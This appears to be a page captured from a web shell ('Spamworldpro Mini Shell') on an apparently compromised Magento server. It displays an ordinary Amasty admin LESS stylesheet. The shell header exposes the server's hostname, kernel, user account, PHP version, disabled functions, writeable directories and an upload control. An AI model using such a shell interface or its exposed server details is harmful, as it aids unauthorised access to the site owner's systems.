Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/amasty/base/view/adminhtml/web/css/source/module/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/amasty/base/view/adminhtml/web/css/source/module/_extensions.less
//
//  Amasty Base Extensions & Notifications
//  ____________________________________________

//
//  Common
//  --------------------------------------------

& when (@media-common = true) {
    /* phpcs:ignore Magento2.Less.ClassNaming.NotAllowedSymbol */
    .adminhtml-system_config-edit .ambase-page-title {
        color: @ambase__page-title__color;
        font-size: 18px;
        font-weight: bold;
        letter-spacing: -.03em;
        margin-bottom: 40px;
        text-transform: capitalize;
    }

    .ambase-buttons-block {
        & {
            display: flex;
            margin-bottom: 30px;
        }

        .ambase-button {
            border-radius: 4px;
            color: @color-white;
            padding: 10px 15px;
            position: relative;
            text-decoration: none;
            transition: background-color .3s ease-in-out;
        }

        .ambase-button.-orange {
            & {
                background-color: @ambase__orange-color;
                padding-right: 46px;
            }

            &:hover {
                background-color: @color-phoenix-brown-almost;
            }

            &:after {
                background: @ambase-extensions-icon__updates__background;
                content: '';
                height: 10px;
                position: absolute;
                right: 24px;
                top: ~'calc(50% - 6px)';
                width: 12px;
            }
        }

        .ambase-button.-blue {
            & {
                background-color: @color-white;
                border: 1px solid @color-blue-pure;
                color: @color-gray19;
                margin-left: 10px;
                padding-right: 43px;
            }

            &:hover {
                background-color: @ambase__button-hover__color;
            }

            &:after {
                background: @ambase-extensions-icon__how-to-update__background;
                content: '';
                height: 10px;
                position: absolute;
                right: 22px;
                top: ~'calc(50% - 6px)';
                width: 12px;
            }
        }
    }

    /* phpcs:ignore Magento2.Less.ClassNaming.NotAllowedSymbol */
    .ambase-tab-container > .admin__page-nav-title._collapsible {
        padding-right: 10rem;
    }

    /* phpcs:ignore Magento2.Less.ClassNaming.NotAllowedSymbol */
    .ambase-tab-container > .admin__page-nav-title:before {
        background: @ambase__orange-color;
        border-radius: 4px;
        color: @color-white;
        font-size: 16px;
        font-weight: bold;
        height: 26px;
        line-height: 22px;
        padding: 2px 0;
        position: absolute;
        right: 50px;
        text-align: center;
        top: ~'calc(50% - 13px)';
        width: 44px;
    }

    .ambase-grid-buttons {
        .ambase-button {
            background-color: @ambase__grid-button__color;
            border: 1px solid @ambase__grid-button__border-color;
            border-radius: 5px;
            box-sizing: border-box;
            font-weight: 400;
            margin-right: 15px;
            padding: 12px;
            transition: background-color .4s ease-in;
        }

        .ambase-button.-active,
        .ambase-button:hover {
            background-color: @ambase__grid-button__color-hover;
            color: @color-white;
        }

        .ambase-counter:before {
            content: '(';
        }

        .ambase-counter:after {
            content: ')';
        }
    }

    .ambase-products-table {
        & {
            background: @color-white;
            border-radius: 6px;
            box-shadow: 0 2px 13px rgba(95, 146, 247, .13);
            margin-top: 30px;
            padding: 15px 30px 30px;
            text-align: left;
        }

        .ambase-thead .ambase-tr,
        .ambase-tbody .ambase-tr:not(:last-child) {
            border-bottom: 1px solid @ambase__products-table__border-color;
        }

        .ambase-tbody {
            display: block;
            max-height: 300px;
            overflow-y: auto;
        }

        .ambase-th {
            color: @ambase__products-table__header-color;
        }

        .ambase-td,
        .ambase-th {
            padding: 15px 0;
        }

        .ambase-tr {
            display: table;
            table-layout: fixed;
            width: 100%;
        }
    }

    .ambase-products-table,
    .ambase-menu-container {
        .ambase-plan {
            font-weight: bold;

            &:before {
                content: '(';
            }

            &:after {
                content: ')';
            }
        }
    }

    .ambase-table-container {
        & {
            width: 100%;
        }

        .ambase-link {
            padding-left: 17px;
            position: relative;
        }

        .ambase-link:before {
            background: @ambase-extensions-icon__upgrade__background;
            content: '';
            height: 12px;
            left: 0;
            position: absolute;
            top: 50%;
            transform: translateY(-50%);
            width: 12px;
        }

        .ambase-version {
            padding-left: 15px;
            position: relative;
        }

        .ambase-version:before {
            content: '';
            left: 0;
            position: absolute;
            top: 50%;
            transform: translateY(-50%);
        }

        .ambase-version.-last:before {
            background: @ambase-extensions-icon__last_version__background;
            height: 7px;
            width: 9px;
        }

        .ambase-version.-current:before {
            background: @ambase-extensions-icon__current_version__background;
            height: 8px;
            width: 10px;
        }

        .ambase-version.-update {
            color: @ambase__orange-color;
            padding-left: 26px;
        }

        .ambase-version.-update:before {
            background: @ambase-extensions-icon__arrow__background;
            height: 8px;
            width: 21px;
        }
    }

    .ambase-version-container {
        margin-bottom: 5px;
    }

    /* phpcs:ignore Magento2.Less.AvoidId.IdSelectorUsage */
    .accordion .config #row_cron_configuration .value {
        width: 70%;
    }
}

Spamworldpro Mini